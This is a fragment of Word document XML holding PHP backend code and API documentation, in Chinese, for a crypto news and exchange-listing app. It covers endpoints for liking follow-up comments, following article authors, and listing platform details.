    <w:p w14:paraId="53548E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】已取消点赞您所发布的资讯追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DFE6E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$ping_xia['uid'], $content, '', $ping_xia['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54EDA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55FF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用户取消点赞成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A49E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0FEAA5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C9CC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3BD8E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Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1ADC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63883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7B2D45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12E0F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=&gt; time(),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5ADB5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375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Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6329F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$ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BC9C7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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6700C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】已点赞您所发布的资讯追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23F33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$ping_xia['uid'], $content, '', $ping_xia['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43ADA3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76A29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3ECCDC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542BB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0B38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864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C84EC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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226691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53E063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$article_ping_xia_zan_id = Db::name('article_ping_xia_zan')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="626197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550B3A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($article_ping_xia_zan_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD5AB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Db::name('article_ping_xia')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62203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-&gt;where('id', $ping_xia_id)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0817CE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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D8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】已点赞您所发布的资讯追评</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63340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$ping_xia['uid'], $content, '', $ping_xia['aid']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F312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C73C4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0046D4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3864FF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B7BB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9F9C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4C2C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7558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641B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该文章追评不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632E7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0841CF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BC95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B58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863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ABAD2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用户点赞失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C39F4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5656AA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CDD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EBDC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72B7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/api/article/follow_author </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>关注｜取消关注资讯文章作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50030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关注｜取消关注资讯文章作者</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2068AA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资讯</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A6A6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E5007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Token</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4B39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（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F25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用户关注文章作者成功</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33522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已关注；</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>0-</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>已取消关注</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71EA49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用户关注文章作者失败</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44133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2F6A9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6B6E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follow_author()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F8B77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66F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C880C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0A649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124C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BE17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请先登录账号，然后关注资讯文章作者</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F6D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6CA53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BCA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A2B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226751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70A85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4ACF0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资讯文章</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79A1BB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C9AA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110F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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D8912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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E8C0D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2DE787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-&gt;where('hide', 1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2640B1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ADFEC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1B88CC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$data['gz_uid'] = $article['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A06D3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$member_guanzhu = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22E20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542134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8DC43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(!empty($member_guanzhu)) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5507D7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Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28ECB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1B7FF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-&gt;delete();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16959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】已取消关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04F112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$article['uid'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F4E0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ED694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用户取消关注文章作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68FF9F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0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31A41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92E1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0EE6F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163D90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$member_guanzhu_id = Db::name('member_guanzhu')</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52D06D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21123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($member_guanzhu_id) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53ECD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】已关注您</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6BA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$article['uid'], $content);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204F5C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F955F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用户关注文章作者成功</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4072F8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1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15BBF9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6F6E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F8DF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AD53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A68F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8794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该资讯文章不存在</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FD70F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28721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566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9CC5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57EC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0EC6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用户关注文章作者失败</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD40E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6145B0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83E8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8536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57F95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6AA02E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1E29A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0167B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3989AB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ccxt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="718778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class Platform extends Common</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751A07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28D5A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CC7C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56CD6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0A39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435071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0D2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12A71A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A86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6B198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FA9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453101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2668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7C5B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/api/platform/lists </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DDF09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应用列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="007110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应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CA5B8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CB0DE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8511A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@apiUse MyPages</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F6E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kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用分类（包括：交易所、资讯、挖矿）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2BAC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{Object[]} data  </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5880F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data.id </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B4FD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data.name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256D9B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data.logo </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78F51C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data.details </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E4DA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data.introduction </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34413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data.address </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="442D12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data.symbol_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1023E6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data.score </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C5042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data.market_value </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E1EB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data.kind </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B30F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data.official_website_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61668A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data.app_download_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35E484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data.alternate_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备用地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AC172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data.service_charge_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务费地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5559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data.spot_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现货交易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0767C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data.futures </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>期货交易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32847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data.legal_currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>法币交易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1F278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data.otc_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>场外交易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4B2192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data.facebook facebook</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62035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data.weibo weibo</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3662D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data.twitter twitter</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A27E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data.telegram telegram</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>账号</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36D956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E36F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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122B26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6FAF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$pages=input('param.pages');    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03AC7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$kind=input('param.kind');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3E6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$where=array();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178595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if($kind)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AC1D7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$where['kind']=$kind;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797DD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$platforms=Db::name('platform')-&gt;where($where)-&gt;order('id asc')-&gt;paginate($pages)-&gt;toarray();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C3C07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$replace_img=function($app){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E677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$preg="/^http(s)?:\\/\\/.+/";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="057304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$app['logo']=preg_match($preg, $app['logo'])?$app['logo']:_imgUrl() . $app['logo'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28813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$app;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F63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618D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$platforms['data']=array_map($replace_img, $platforms['data']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168F98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json($platforms);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DED14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49F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1EAE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/api/platform/details </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="671A96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应用详情</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FEFF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应用</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EA941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E44C0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A360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id    </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（必填）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB0D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CFCE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id     </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>id</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2FE3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name </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用名称</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01386C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logo </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>logo</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C9585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details </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F386F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introduction </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>基础信息</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73256C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address </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DBB9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symbol_num </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>交易对数量</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FA20D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score </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>评分</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26DF8E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market_value </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>市值</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="697CB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official_website_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>官网地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71C49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app_download_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>应用下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE043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alternate_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>备用地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9C4A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service_charge_url </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>服务费地址</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69E0F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spot_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>现货交易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758865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futures </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>期货交易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0CADCD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legal_currency </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>法币交易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02B79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otc_trading </w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>场外交易</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>不支持</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
